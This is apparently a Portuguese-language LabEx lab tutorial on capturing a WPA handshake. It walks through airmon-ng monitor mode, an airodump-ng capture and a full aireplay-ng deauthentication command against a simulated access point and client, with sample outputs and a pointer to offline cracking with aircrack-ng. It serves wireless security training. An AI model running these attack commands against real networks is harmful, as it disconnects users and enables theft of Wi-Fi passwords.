LabEx
EntrarJunte-se

Forçar um Handshake WPA com um Ataque de Desautenticação aireplay-ng

Beginner
Pratique Agora

Introdução

Bem-vindo a este laboratório sobre como forçar a captura de um handshake WPA. O handshake de quatro vias WPA/WPA2 é um dado crítico necessário para tentar quebrar a senha de uma rede Wi-Fi. Embora você possa esperar passivamente que um dispositivo se conecte à rede para capturar este handshake, isso pode consumir muito tempo.

Uma abordagem mais ativa é forçar um cliente atualmente conectado a desconectar e, em seguida, reconectar imediatamente. Este processo é chamado de ataque de desautenticação (ou "deauth"). Quando o cliente se reconecta, ele executa o handshake de quatro vias, que você pode então capturar.

Neste laboratório, você usará o aireplay-ng, uma ferramenta poderosa do conjunto aircrack-ng, para realizar um ataque de desautenticação contra um cliente Wi-Fi simulado. Isso permitirá que você capture de forma confiável o handshake WPA para análise. Nosso ambiente de laboratório foi pré-configurado com um ponto de acesso sem fio (AP) virtual chamado MyTestAP e um cliente conectado.

Identificar um Cliente Associado de uma Varredura airodump-ng

Nesta etapa, você preparará sua interface sem fio para monitoramento e, em seguida, usará o airodump-ng para encontrar o ponto de acesso alvo e seu cliente conectado.

Primeiro, você precisa colocar uma de suas interfaces sem fio virtuais em modo de monitoramento. Este modo permite que a interface capture todo o tráfego Wi-Fi no ar, não apenas o tráfego destinado a ela. Usaremos a interface wlan1.

Execute o seguinte comando para iniciar o modo de monitoramento na wlan1:

sudo airmon-ng start wlan1

Este comando criará uma nova interface de monitoramento, tipicamente chamada wlan1mon. Você deverá ver uma saída confirmando que o modo foi ativado.

PHY     Interface       Driver          Chipset

phy0    wlan0           mac80211_hwsim  Software simulator
phy1    wlan1           mac80211_hwsim  Software simulator

                (mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
                (mac80211 station mode vif disabled for [phy1]wlan1)

Agora, execute o airodump-ng na nova interface de monitoramento (wlan1mon) para iniciar a varredura. Usaremos o flag -w para gravar os pacotes capturados em um arquivo chamado capture, e especificaremos o BSSID e o canal do nosso AP alvo para focar a varredura. O BSSID para o nosso AP simulado é 02:00:00:00:01:00 e ele está no canal 6.

sudo airodump-ng -w capture --bssid 02:00:00:00:01:00 -c 6 wlan1mon

Deixe o airodump-ng rodar. Você verá uma tela que se atualiza em tempo real. A parte superior lista os pontos de acesso próximos, e a parte inferior lista os clientes conectados a eles. Você deverá ver o nosso AP, MyTestAP, e um cliente conectado a ele.

A saída será semelhante a esta:

CH  6 ][ Elapsed: 10 s ][ 2023-10-27 10:30

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 02:00:00:00:01:00  -30       10        5    0   6  540  WPA2 CCMP   PSK  MyTestAP

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 02:00:00:00:01:00  02:00:00:00:02:00  -35    0- 1      0        5

A partir desta saída, identifique e anote:

  • BSSID: 02:00:00:00:01:00 (O endereço MAC do AP).
  • STATION: 02:00:00:00:02:00 (O endereço MAC do cliente conectado).

Mantenha este terminal em execução. Você precisará dele para confirmar a captura do handshake mais tarde.

Abrir um Novo Terminal para o Ataque de Desautenticação

Nesta etapa, você abrirá uma nova janela de terminal. O comando airodump-ng da etapa anterior deve continuar em execução no primeiro terminal para escutar o handshake WPA. O ataque de desautenticação será lançado a partir de um segundo terminal separado.

Para abrir um novo terminal, clique no ícone + na barra de guias do terminal na parte superior da janela do terminal.

Abrir Novo Terminal

Assim que o novo terminal for aberto, você estará no diretório ~/project, pronto para executar o comando de ataque na próxima etapa. Todos os comandos subsequentes para o próprio ataque devem ser executados neste novo terminal.

Construir o Comando aireplay-ng Deauth com --deauth

Nesta etapa, você construirá o comando aireplay-ng que realizará o ataque de desautenticação. Você usará as informações coletadas na Etapa 1.

A sintaxe básica para um ataque de desautenticação com aireplay-ng é:
aireplay-ng --deauth <número_de_pacotes> -a <BSSID_AP> -c <STATION_Cliente> <interface>

Vamos detalhar os componentes:

  • --deauth: Esta flag especifica o modo de ataque de desautenticação.
  • <número_de_pacotes>: Este é o número de pacotes de desautenticação a serem enviados. Enviar um pequeno pacote, como 5, geralmente é suficiente para desconectar o cliente.
  • -a <BSSID_AP>: Isso especifica o endereço MAC do Ponto de Acesso alvo. Da Etapa 1, este é 02:00:00:00:01:00.
  • -c <STATION_Cliente>: Isso especifica o endereço MAC do cliente que você deseja desconectar. Da Etapa 1, este é 02:00:00:00:02:00.
  • <interface>: Esta é a sua interface sem fio em modo de monitoramento, que é wlan1mon.

Agora, monte o comando completo em seu novo terminal. Ele deve parecer exatamente com isto:

sudo aireplay-ng --deauth 5 -a 02:00:00:00:01:00 -c 02:00:00:00:02:00 wlan1mon

Não pressione Enter ainda. Na próxima etapa, você executará este comando.

Executar o Ataque Direcionado ao Cliente e AP

Nesta etapa, você executará o comando que acabou de construir para lançar o ataque.

Na sua segunda janela de terminal, pressione Enter para executar o comando aireplay-ng.

sudo aireplay-ng --deauth 5 -a 02:00:00:00:01:00 -c 02:00:00:00:02:00 wlan1mon

A ferramenta começará imediatamente a enviar pacotes de desautenticação. A saída mostrará o tempo e que está enviando desautenticações direcionadas ao cliente.

A saída será semelhante a esta:

10:35:10  Waiting for beacon frame (BSSID: 02:00:00:00:01:00) on channel 6
10:35:10  Sending 64 directed DeAuths to 02:00:00:00:02:00 (code 7).
10:35:11  Sending 64 directed DeAuths to 02:00:00:00:02:00 (code 7).
...

O ataque é muito rápido. Assim que você executar o comando, o cliente alvo será desconectado da rede e tentará reconectar imediatamente. Este processo de reconexão é o que gera o handshake WPA que queremos capturar.

Mude rapidamente de volta para o seu primeiro terminal (aquele que está executando o airodump-ng) para observar o resultado na próxima etapa.

Confirmar Captura do Handshake na Janela do airodump-ng

Nesta etapa, você confirmará que o ataque de desautenticação foi bem-sucedido verificando a mensagem de handshake WPA na sua janela do airodump-ng.

Volte para o seu primeiro terminal. Se o ataque funcionou, você verá uma nova mensagem no canto superior direito da exibição do airodump-ng:

WPA handshake: 02:00:00:00:01:00

Esta mensagem confirma que o airodump-ng interceptou e gravou com sucesso o handshake de quatro vias para o BSSID especificado.

CH  6 ][ Elapsed: 45 s ][ 2023-10-27 10:35 ][ WPA handshake: 02:00:00:00:01:00

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 02:00:00:00:01:00  -30       48       82    1   6  540  WPA2 CCMP   PSK  MyTestAP

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 02:00:00:00:01:00  02:00:00:00:02:00  -36    0- 1      0       75

Agora que você tem o handshake, pode parar a captura. Pressione Ctrl+C no terminal do airodump-ng para pará-lo.

Como você usou a flag -w capture na Etapa 1, o airodump-ng salvou o tráfego capturado em arquivos no seu diretório atual (~/project). Liste os arquivos para ver os resultados.

ls -l

Você deverá ver vários arquivos começando com capture, incluindo capture-01.cap. Este arquivo .cap contém os dados brutos dos pacotes, incluindo o handshake WPA que você acabou de capturar.

-rw-r--r-- 1 root  root    450 Oct 27 10:36 capture-01.cap
-rw-r--r-- 1 root  root    892 Oct 27 10:36 capture-01.csv
-rw-r--r-- 1 root  root    634 Oct 27 10:36 capture-01.kismet.csv
-rw-r--r-- 1 root  root    128 Oct 27 10:36 capture-01.kismet.netxml
-rw-r--r-- 1 labex labex   121 Oct 27 10:28 hostapd.conf
-rw-r--r-- 1 labex labex    52 Oct 27 10:28 wpa_supplicant.conf

O arquivo capture-01.cap é o prêmio. Ele pode agora ser usado com ferramentas de quebra de senha como aircrack-ng para tentar descobrir a chave pré-compartilhada da rede.

Resumo

Parabéns por completar este laboratório! Você realizou com sucesso um ataque de desautenticação para forçar e capturar um handshake WPA.

Neste laboratório, você aprendeu a:

  • Colocar uma interface sem fio em modo de monitoramento usando airmon-ng.
  • Escanear e identificar um AP e cliente alvo com airodump-ng.
  • Construir e executar um ataque de desautenticação usando aireplay-ng.
  • Confirmar a captura do handshake WPA e localizar o arquivo .cap resultante.

Esta é uma habilidade fundamental em testes de segurança de redes sem fio. O arquivo de handshake capturado é o ingrediente chave para a próxima fase: a quebra de senha offline usando uma ferramenta como aircrack-ng e uma lista de palavras abrangente.